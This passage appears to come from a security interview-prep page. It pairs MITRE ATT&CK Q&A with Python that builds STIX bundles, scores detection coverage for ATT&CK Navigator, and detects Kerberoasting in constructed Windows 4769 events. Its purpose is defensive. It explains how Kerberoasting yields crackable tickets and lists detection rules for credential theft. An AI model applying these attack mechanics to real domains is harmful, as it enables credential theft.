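
def attack_pattern(name, technique_id):
    url = "https://attack.mitre.org/techniques/" + technique_id.replace(".", "/")
    return _sdo("attack-pattern", name=name, external_references=[
        {"source_name": "mitre-attack", "external_id": technique_id, "url": url}])


def relationship(source, target, rel_type):
    return _sdo("relationship", relationship_type=rel_type,
                source_ref=source["id"], target_ref=target["id"])


def bundle(*objects):
    return {"type": "bundle", "id": f"bundle--{uuid.uuid4()}", "objects": list(objects)}


def to_json(b) -> str:
    return json.dumps(b, indent=2)


def validate(b) -> list:
    """Return problems: missing required props, malformed ids, dangling relationship refs."""
    problems = []
    ids = {o.get("id") for o in b.get("objects", [])}
    for o in b.get("objects", []):
        t = o.get("type", "?")
        for p in COMMON + REQUIRED.get(t, ()):
            if p not in o:
                problems.append(f"{t}: missing {p}")
        oid = o.get("id", "")
        if not ID_RE.match(oid) or not oid.startswith(t + "--"):
            problems.append(f"{t}: malformed id {oid!r}")
        if t == "relationship":
            for ref in ("source_ref", "target_ref"):
                if o.get(ref) not in ids:
                    problems.append(f"relationship: dangling {ref} {o.get(ref)!r}")
    return problems


def build_sample_bundle():
    """Constructed intel: a C2 domain and dropper hash tied to a made-up RAT family
    that uses T1071.001 (names, domain and hash are all invented for this example)."""
    sha256 = hashlib.sha256(b"constructed dropper sample").hexdigest()
    ioc = indicator("Dropper and C2 for ExampleRAT",
                    f"[domain-name:value = 'cdn-update.example.test'] OR "
                    f"[file:hashes.'SHA-256' = '{sha256}']")
    rat = malware("ExampleRAT", is_family=True)
    ap = attack_pattern("Application Layer Protocol: Web Protocols", "T1071.001")
    return bundle(ioc, rat, ap, relationship(ioc, rat, "indicates"), relationship(rat, ap, "uses"))


if __name__ == "__main__":
    b = build_sample_bundle()
    print(to_json(b))
    print("problems:", validate(b))
```

The `external_references` entry with `source_name` "mitre-attack" is how ATT&CK's own STIX data identifies techniques, so a consumer can join shared indicators to its Navigator coverage by `external_id` instead of by object UUID.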
Interview Preparation
Walk me through the MITRE ATT&CK framework and how you've used it.
MITRE ATT&CK is a knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world observations. It has 14 tactics (the WHY — from Reconnaissance to Impact) and hundreds of techniques (the HOW). I've used it for:
1. Detection engineering — mapping SIEM rules to specific technique IDs to measure detection coverage.
2. Threat modeling — understanding which techniques adversaries targeting our industry commonly use.
3. Red team exercises — structuring attack simulations around specific tactics.
4. Gap analysis — overlaying our security controls against the ATT&CK matrix to identify coverage gaps. Tools like MITRE ATT&CK Navigator help visualize this mapping.
Explain the difference between Tactics, Techniques, and Procedures in ATT&CK.
Tactics are the adversary's goals — WHY they perform an action (e.g., Privilege Escalation to gain higher access). Techniques are HOW they achieve those goals (e.g., T1068 Exploitation for Privilege Escalation). Sub-techniques are more specific variations (e.g., T1059.001 PowerShell under Command & Scripting Interpreter). Procedures are the specific implementation details — exactly how a particular threat group uses a technique (e.g., APT29 uses PowerShell encoded commands for execution). This hierarchy helps defenders at different levels: tactics for strategic planning, techniques for detection rules, procedures for threat intelligence.
How would you use ATT&CK to assess your SOC's detection coverage?
Step 1: Map existing SIEM rules, EDR detections, and network monitoring to ATT&CK technique IDs using ATT&CK Navigator. Step 2: Identify gaps — techniques with no detection rules. Step 3: Prioritize using threat intel — which techniques do adversaries targeting your industry commonly use (use groups like APT28, FIN7 as reference). Step 4: Build new detections for high-priority gaps. Step 5: Validate with purple team exercises — run atomic tests for each technique and verify alerts fire. Step 6: Create a heatmap showing coverage levels (none, partial, full) per technique. Track improvement quarterly. This gives leadership a visual, data-driven view of detection maturity.
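The coverage assessment described in the six steps above, carried through as an added example that is not part of the original page: a detection inventory mapped to technique IDs is scored (none / tuning / production), compared against a threat-intel priority list to produce the gap list, and serialized as an ATT&CK Navigator layer file that renders as the heatmap in step 6. The rule inventory and priority list are constructed; the layer-format version fields (layer 4.5 for Navigator 4.9 against ATT&CK v14) are an assumption to adjust for your Navigator version.

```python
import json
from collections import defaultdict

# Constructed detection inventory and priority list (not a real SOC's rules).
RULES = [
    {"name": "PS encoded command", "techniques": ["T1059.001"], "status": "production"},
    {"name": "LSASS access by non-system process", "techniques": ["T1003.001"], "status": "production"},
    {"name": "Kerberoast RC4 TGS", "techniques": ["T1558.003"], "status": "tuning"},
    {"name": "Vssadmin shadow delete", "techniques": ["T1490"], "status": "production"},
    {"name": "DNS tunneling entropy", "techniques": ["T1071.004", "T1048.003"], "status": "tuning"},
]
# What threat intel says the groups targeting this sector use most (constructed list).
PRIORITY_TECHNIQUES = ["T1059.001", "T1003.001", "T1558.003", "T1490",
                       "T1071.004", "T1021.001", "T1566.001"]
SCORES = {"tuning": 1, "production": 2}   # no rule at all scores 0


def coverage(rules, priority) -> dict:
    """Best score per technique plus the rules behind it, over the union of
    techniques that have rules and techniques that intel says matter."""
    best, why = defaultdict(int), defaultdict(list)
    for r in rules:
        for t in r["techniques"]:
            best[t] = max(best[t], SCORES[r["status"]])
            why[t].append(f"{r['name']} ({r['status']})")
    return {t: {"score": best[t], "rules": why[t]} for t in set(priority) | set(best)}


def gaps(cov, priority) -> list:
    """Priority techniques with no detection at all, in priority order."""
    return [t for t in priority if cov[t]["score"] == 0]


def navigator_layer(cov, name="Detection coverage") -> dict:
    """ATT&CK Navigator layer (format version fields are assumed; check your instance)."""
    return {
        "name": name,
        "versions": {"attack": "14", "navigator": "4.9.1", "layer": "4.5"},
        "domain": "enterprise-attack",
        "description": "0 = no detection, 1 = rule in tuning, 2 = production rule",
        "techniques": [
            {"techniqueID": t, "score": c["score"],
             "comment": "; ".join(c["rules"]) or "no detection"}
            for t, c in sorted(cov.items())
        ],
        "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 2},
        "legendItems": [{"label": "none", "color": "#ff6666"},
                        {"label": "tuning", "color": "#ffe766"},
                        {"label": "production", "color": "#8ec843"}],
    }


def layer_json(cov) -> str:
    return json.dumps(navigator_layer(cov), indent=2)


if __name__ == "__main__":
    cov = coverage(RULES, PRIORITY_TECHNIQUES)
    print("gaps:", gaps(cov, PRIORITY_TECHNIQUES))
    print(layer_json(cov))
```

Saving the JSON and opening it through "Open Existing Layer" in Navigator gives the per-technique heatmap; re-running the script each quarter and diffing the gap list is the improvement tracking the answer describes.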
What is Kerberoasting (T1558.003) and how do you detect/prevent it?
Kerberoasting abuses the Kerberos protocol: any domain user can request a TGS (service) ticket for an account that has a registered Service Principal Name (SPN), and part of that ticket is encrypted with a key derived from the service account's password (with RC4, the account's NT hash), so the ticket can be taken offline and cracked. Detection: Monitor for anomalous TGS requests (Event ID 4769), especially with RC4 encryption (TicketEncryptionType 0x17 rather than AES 0x11/0x12), requests from unusual sources, or a high volume of TGS requests for many different SPNs from a single user in a short window. Prevention: Use Group Managed Service Accounts (gMSA), whose 120-character passwords rotate automatically (every 30 days by default). Set long, complex passwords (25+ characters) on service accounts that cannot be migrated. Enforce AES encryption for Kerberos. Minimize SPNs by removing unnecessary ones. Alert on service account usage from non-service hosts.
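The two Kerberoasting detections from this answer and from the Credential Access section above (RC4 service tickets, and one user requesting tickets for many SPNs in a short window), as an added example that is not part of the original page, run over Windows Security 4769 events. The events, the CORP.LOCAL realm, the service account names and the thresholds are constructed for the example; in production the RC4 rule is baselined against the accounts that legitimately still negotiate RC4.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"            # 4769 TicketEncryptionType for RC4-HMAC; AES128 = 0x11, AES256 = 0x12


def build_events():
    """Constructed Security log 4769 (TGS request) events, not real telemetry."""
    base = datetime(2024, 5, 1, 11, 0, 0)
    events = [
        {"ts": base, "event_id": 4769, "user": "alice@CORP.LOCAL", "service": "FS01$",
         "etype": "0x12", "src_ip": "10.0.1.20", "status": "0x0"},          # normal CIFS ticket, AES
        {"ts": base + timedelta(seconds=5), "event_id": 4769, "user": "bob@CORP.LOCAL",
         "service": "svc-sql", "etype": "0x12", "src_ip": "10.0.1.21", "status": "0x0"},  # normal, AES
    ]
    for i, spn_account in enumerate(("svc-sql", "svc-backup", "svc-web",
                                     "svc-sccm", "svc-exchange", "svc-adfs")):
        events.append({"ts": base + timedelta(seconds=30 + 10 * i), "event_id": 4769,
                       "user": "mallory@CORP.LOCAL", "service": spn_account,
                       "etype": RC4_HMAC, "src_ip": "10.0.1.77", "status": "0x0"})  # roast burst
    return events


def is_roastable(e) -> bool:
    """Only tickets for user-type service accounts matter: machine accounts ($)
    have random 120-char passwords, and krbtgt tickets are TGTs, not service tickets."""
    return (e["status"] == "0x0" and not e["service"].endswith("$")
            and e["service"].lower() != "krbtgt")


def detect_kerberoast(events, window=timedelta(minutes=5), min_services=5) -> list:
    """Two rules: any RC4 service ticket for a roastable account, and any user who
    collects tickets for `min_services` distinct accounts within `window`."""
    alerts = []
    by_user = defaultdict(list)
    for e in events:
        if e["event_id"] != 4769 or not is_roastable(e):
            continue
        if e["etype"] == RC4_HMAC:    # downgrade: the ticket is encrypted with the NT hash
            alerts.append({"rule": "rc4-service-ticket", "user": e["user"],
                           "service": e["service"], "src_ip": e["src_ip"]})
        by_user[e["user"]].append(e)
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            services = {x["service"] for x in evs[i:] if x["ts"] - first["ts"] <= window}
            if len(services) >= min_services:
                alerts.append({"rule": "spn-enumeration-burst", "user": user,
                               "services": sorted(services), "src_ip": first["src_ip"]})
                break
    return alerts


if __name__ == "__main__":
    for a in detect_kerberoast(build_events()):
        print(a)
```

The burst rule is what catches attackers who have already been forced onto AES: it needs no encryption-type downgrade, only the fact that one principal rarely has a reason to touch six service accounts in a minute.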